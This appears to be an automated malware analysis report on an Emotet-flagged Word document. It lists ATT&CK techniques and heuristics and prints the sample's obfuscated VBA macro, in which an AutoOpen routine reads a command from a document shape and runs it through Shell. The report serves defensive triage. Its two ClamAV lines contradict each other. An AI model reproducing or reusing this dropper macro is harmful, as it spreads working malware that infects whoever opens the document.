Risk Score: 292 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for Emotet. The macro attempts to execute cmd.exe with specific flags, likely to download and run a secondary payload. Heuristics indicate suspicious cmd.exe and PowerShell invocations, and the ClamAV signature directly identifies it as Emotet.
Heuristics (10)
- ClamAV: Doc.Malware.Emotet-6780750-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emotet-6780750-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `_ .Shell(ahtsWlu, oErzu), DQHvS) qRoplTGMvSauGKk = (281985326 + Round(LlQwmzsABvEvnjsRIpIMhhA) * 303676712 - EBrttnGLGLniLDU + (okXCRHmicwVciLdlVnhwBGHI / Tan(jhVEjzlnPszcrrzOIRvRdjuh)))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Attribute VB_Customizable = True Sub autoopen() kcwfdQtdG`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4770 bytes |

SHA-256: b5cbb18e474603b6a793a20da4b511b8545b45c6332c7a0cca50a32c9f2e5f6a

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 135 of 167 identifiers look randomly generated (e.g. 'iWXimYKsVbwtMWSsPcAntrhb'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "FwqGFJCXLnvaw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() kcwfdQtdG End Sub Attribute VB_Name = "RjiTbsXAELWEws" Function kcwfdQtdG() On Error Resume Next nEWpCGwEiaNkaQFFG = (135348292 + Round(dduEdfpllphQlzd) * 288551995 - OdPflwpDhwJpsmhAOCn + (zsKNUNOzJbkwYirdFdrjEBv / Tan(jwtDzQWzpwaVTBKYirtG))) MQNvDvlLHowzihXT = 74351202 EVQkiiBhstdvdEuIC = (10607366 + Round(ZWmJXSwXiFdlPXTc) * 146336823 - GRVWcQXOqjqHUB + (OiwSMtRlLTbPHNXJb / Tan(HvknCtVmIcNhblbUBsX))) JHpjKDBBPBSZOjMF = 211406568 cYfimvAhSstuEHzcjtcwXFM = (161802719 + Round(jRRcSPulGChilsKXBfU) * 28529444 - ZnfDGdzOWXLHIGdjF + (dwIwFStwBRaVZs / Tan(HGdmZLlzXjfWbcljow))) rFJaiMKHcfnBwTnBzzwf = 265944892 YbWkTzUucclNoPCYo = (237480001 + Round(EsKoOACtczYthSwDWYQn) * 340761385 - NsDsKpQihGKotYNnHkQ + (swEiDupLfAXwhci / Tan(kWpNduPRisZZpjQjW))) jRoUoQzEChjNHQtvDlvDbwj = 254588541 ccrJIVpBlUjMGlKXtEUPPUwA = (290493155 + Round(LHkzHmtJEIpMzppNG) * 158207103 - jtfflGMtHjIjqRtKiQ + (NtTzhBijGiZCNYhLVjbzqu / Tan(lZvbwvEfHzRKZNwwdDZFPhh))) IJFYiGRzSBhXlZjlCwSEwNI = 334674153 YUAYPbzVjfNaTI = (267267861 + Round(OpWiCdRtYimQdGuRTrbjaja) * 220489337 - YInfjIhTUwDQVzvDHzho + (sdlwGbjIRiOpFdVdOpaF / Tan(IHrAwsjcSjtswjiCichAKDQo))) PVZZsKGiijWtwIiAfwB = 139149390 sTJzOKdQlLvflPtbrLOvwLMK = (295673666 + Round(XfsAbMwXdXidYJQpiNE) * 68399795 - zuUtXlqAjGwGpmwYl + (jjOlWsOnEfIczGiJakXGD / Tan(IXwQkXjXRRzdViBLYcf))) hKrEHsXfMNAifIYqpGIqE = 218497700 zdKbDdijKAQQwmPREdi = (35918465 + Round(vnhGuSXzWWNXMcmJlhsWYWL) * 303765220 - iCXVrrhthBqdVILGkndDtlJd + (TwliWZcnJQPAiff / Tan(dfbvjQYjPojhqDsttNYu))) KKcOqLsvGGIzXPGihcCYFShp = 304396927 Const oErzu = 0 kiXqfOElufjOSbW = (196162268 + Round(XQouXBacXUnCJzO) * 49484517 - DioUQKPBjVVXYkJASVGXNNdw + (IuRjkiVGVYoplHGZ / Tan(nfEEzkdBrcHjkpErGIQzSzn)))
QCMULhNAwUazrJ = 56827757 jaitmrsdqJbfkUfv = (103838534 + Round(SGZJXZZpUWHYUwbE) * 81720172 - wbDtwqjQrYUTWTiuFM + (WCFUzWWWSpcEjIJzoHYIic / Tan(hBVBzouatPQpTrG))) WcUObOTnLNUpmjD = 33952290 QrAWJaMXYwwsvamnsAjTVjff = (88088830 + Round(LPlwfzZTDzfdnY) * 82640009 - jUbEFiRZWafcchLVI + (PwlcSwTbXpHPNHH / Tan(ALDIzjwLZFUwrWl))) UjJQdGBiliGbRHMY = 142375401 Set htFNXlij = FwqGFJCXLnvaw.Shapes(AwzGK + "DjJESGjQHruO" + FhntQdlN) XrhGvJJPUPZHEEtWZfrGMaq = (55596192 + Round(zrYkGLQjtKTjolkOOnk) * 154233098 - RYJqBIcaiwAZjvS + (iODJXLtanltHswmFlViTP / Tan(ECnJLOSJIpSdjZhNhGijDQP))) ijJvoLNwUkJAWOzfHd = 188570856 hnfnwkUQUOETzzmw = (337212041 + Round(DcpAzKBoYuBzsZsivpjaUnKs) * 128230493 - mYCLjEzEDzUhpU + (JMZOXViaQDzRYbPRzjvYcm / Tan(KzznWtNOzMoKbldw))) IzlImmZcniWAuwJXAOQX = 225044322 fbVFQzrjUVpERzc = (255979721 + Round(HHAEZrJUFtTojiX) * 283464442 - IkKODwfkDPTkbWkQi + (TkCFjLkKDXsnmSNzr / Tan(ctDIVUWbpkdXjXCREHODAzd))) uHsPdBWbfsolNKOiiIVAjjo = 133278977 ahtsWlu = htFNXlij.TextFrame.TextRange + ozEjR + TkPPfAD + aLjKq + QimbW + zAQiTp + LwCDPiji + FiNJGMRP + qFzXYWMa + jidlzk uijNKuNcUwvnslwpVYjS = (198375547 + Round(ocjqkjwbwURVCPERuYECU) * 195052605 - tkIUsHpPjwKpGi + (JidtzaVWiilEiKNbPL / Tan(pFcOGTJFiXsazmZOaZa))) bXOalHDLEVXvijoOhPXa = 278712664 iWXimYKsVbwtMWSsPcAntrhb = (123486578 + Round(fcqrifpzibnCZdqvkJRqQwTO) * 300846607 - UTEqovMmthCiwSD + (oqEMDXzwHYKciiIbz / Tan(LWtrnrqmjIsGMwmBIdJ))) CwVGjQljEKZajYHjVwDN = 149121756 jBSAOruNTjKRXiPDofzQi = (272631043 + Round(SBQwTVdwJVWtKEnAhiEk) * 143646475 - RFVVnznwaGuXAw + (uasqmBwBkFwAfQhaEINkKbwh / Tan(IKvPwmDpCmHMuiCUEkPp))) IisjpOmNmTcKMiqBlmSvLddZ = 96267190 RThrPclwdWitcOblKHJiDFt = (279226137 + Round(aLpQqvOXAZuQmHEiEl) * 157871620 - zANNvZJdPoLZrVp + (whmaTVcphVYAFDzUV / Tan(WZwbURmlILNUZQRniWzzl))) XXfaBJYLorDGzPSUMUoi = 90045891 jGQjOFnbXVkAOGVGkEUmZS = (218849524 + Round(KoqJJmzZwWsquCua) * 89983217 - jDIWVmmJRoLwOOZ + (ZaPdSkYKErOfMi / Tan(uYTldEnSDWzVIOzI))) QrcUKkovfwSiYHziiQYv = 188061778 NwHiRUd =
Array(YzsCawt, dNwWWR, RBUOKi, Interaction _ _ _ _ _ _ _ _ .Shell(ahtsWlu, oErzu), DQHvS) qRoplTGMvSauGKk = (281985326 + Round(LlQwmzsABvEvnjsRIpIMhhA) * 303676712 - EBrttnGLGLniLDU + (okXCRHmicwVciLdlVnhwBGHI / Tan(jhVEjzlnPszcrrzOIRvRdjuh))) MXWYuhcPEhaRdt = 5179489 bUZtIKvrlOjOQRIilK = (243825202 + Round(ozdXURFnBfiTDCT) * 87454953 - YSrzqqXImbwQGtdsR + (drBZrFHpGfPLOwuONstLw / Tan(FPhpGXvmEblUpVN))) bmqAjrsbNAWrflzGjWmmrBwk = 302747499 tJksfNLiSNtDjJ = (98205526 + Round(iFJSisUQbRUOdhoH) * 91563381 - JwUSUYzjVOwoqnSmi + (NiZAoTROtzBlZmpRzSsQk / Tan(TwXGUnahvrCDufsJIAAGf))) fjpJwZnAtOAdPb = 194025532 End Function
```